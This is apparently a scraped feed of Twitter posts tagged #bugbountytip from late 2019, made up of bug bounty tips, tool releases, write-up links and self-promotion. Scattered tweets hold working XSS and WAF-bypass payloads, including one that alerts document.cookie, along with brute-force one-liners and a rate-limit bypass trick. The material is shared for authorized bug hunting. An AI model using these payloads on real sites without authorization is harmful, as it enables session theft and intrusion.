9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters ๐Ÿ˜Ž https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
โœŽ /๐’…๐’†๐’—/๐’๐’–๐’๐’
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSSยด payload, shake dice. ๐ŸŽฒ <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluz๐Ÿ”ฅ
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability ๐Ÿค‘๐Ÿค‘๐Ÿค‘๐Ÿค‘ https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz๐Ÿ”ฅ
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast in the 28th of October. Who's excited? Comment below ๐Ÿ‘‡ what you'd love to hear and tag whom you'd be interested to have as a guests ๐Ÿฅณ #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! It release is specially dedicated to @SlackHQ! An issue that prevent pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife ๐Ÿ˜Ž #BugBounty #BugBountyTip Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! ๐Ÿ˜Ž #BugBounty #BugBountyTip Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parammeter polution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec ๐Ÿš€
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if its vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with ๐Ÿ†๐Ÿ† C|EH Certification ๐Ÿ†๐Ÿ† Join HackDoor for Getting C|EH Certified Today !! ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit ๐Ÿ’ฐ๐Ÿ’ฐ Comment If Your Favourite Tool is Missing ! ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizerโ€™s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN ThโœชsH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, its not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty ๐Ÿ˜„ Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can reck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz๐Ÿ”ฅ
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with ๐Ÿ†๐Ÿ† C|EH Certification ๐Ÿ†๐Ÿ† Join HackDoor for Getting C|EH Certified Today !! ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz๐Ÿ”ฅ
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garapโ€ฆhttps://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite ๐Ÿ˜‚ #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 ๐Ÿ”ฐHOF๐Ÿ”ฐ & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
ฮ›ัะฒั”ฮท
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
ร‡lirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, its a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If your struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If your not looking for these on your bug bounties your missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke ๐Ÿ˜ I really like it's Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading an malicious executable file or pdf, etc. is a โ€œfeatureโ€. No support employee would ever open an attachment without heavy social engineering.. ๐Ÿ™„ Iโ€˜m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! ๐Ÿ˜ Thanks for the #BugBountyTip, @yaworsk! ๐Ÿ™Œ https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads โŒ๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (๐—๐’๐’)-๐‹๐š๐›๐ฌ [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi ๐Ÿ•Š๏ธ โ€
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble ๐Ÿ™ #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads โŒ๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again ๐Ÿ™ƒ! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip ๐Ÿ’ช Do it โœ”
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbingย is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 โ€œThe journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!โ€ by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix it's #blockchain. #TON issues on GitHub are rising, no documentation๐Ÿ™ˆ. After raising 1.5 billion$+ ๐Ÿ’ธ Contest ๐Ÿ’Žhttps://t.co/P1q9EigN7x $TON GitHub ๐Ÿ’Žhttps://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 โ€œ#BugBounty โ€” โ€˜Journey from LFI to RCE!!!โ€™-Howโ€ by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you canโ€™t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads โŒ๐Ÿ’ช๐Ÿ‘‰https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
๐™ฟ๐š˜๐š–๐šŽ๐š๐š›๐šŠ๐š—๐šŠ๐š๐šŽ ๐ŸŒด
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! ๐Ÿ‘€ @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! ๐Ÿ“ฆ๐Ÿ”“#BugBountyTip ๐Ÿ‘‰ https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)๐Ÿ™Œ #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Androidโ€™s most popular apps Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Googleโ€™s bug bounty programs paid out almost $3M in 2017 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood ๐Ÿ‡ต๐Ÿ‡ฐ
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)๐Ÿ™Œ #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate ๐ŸŒด
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() werenโ€™t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluz๐Ÿ”ฅ
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
